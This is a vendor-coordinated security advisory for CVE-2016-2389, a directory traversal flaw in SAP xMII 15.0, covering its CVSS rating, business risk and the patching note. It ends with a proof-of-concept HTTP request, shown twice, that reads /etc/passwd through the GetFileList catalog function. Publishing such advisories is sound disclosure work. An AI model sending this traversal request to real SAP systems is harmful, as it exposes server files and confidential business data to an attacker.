Application: SAP xMII **Versions Affected:**SAP MII 15.0 Vendor URL:SAP **Bugs:**Directory traversal **Reported:**29.07.2015 **Vendor response:**30.07.2015 **Date of Public Advisory:**09.02.2016 **Reference:**SAP Security Note 2230978 Author: Dmitry Chastuhin (ERPScan)
VULNERABILITY INFORMATION
Class: [CWE-36]
Impact: SAP xMII directory traversal, read file from server
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-2389
CVSS Information
CVSS Base Score v3: 7.5 / 10
CVSS Base Vector:
AV : Access Vector (Related exploit range) | Network (N) |
---|---|
AC : Access Complexity (Required attack complexity) | Low (L) |
Au : Authentication (Level obf authentication needed to exploit) | None (N) |
C : Impact to Confidentiality | High (H) |
I : Impact to Integrity | None(N) |
A : Impact to Availability | None (N) |
Description
An attacker can use a special request to read files from a server to escalate their privileges.
Business risk
An attacker can use a directory traversal vulnerability to access arbitrary files and directories located in an SAP server filesystem including application source code, configuration, and system files. It allows obtaining critical technical and business-related information stored in the vulnerable SAP system.
VULNERABLE PACKAGES
SAP MII 15.0
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2230978
TECHNICAL DESCRIPTION
An attacker can use xMII function GetFileList to read files from the server.
PoC
GET /XMII/Catalog?Mode=GetFileList&Path=Classes/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd
1
|
GET /XMII/Catalog?Mode=GetFileList&Path=Classes/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd
—|—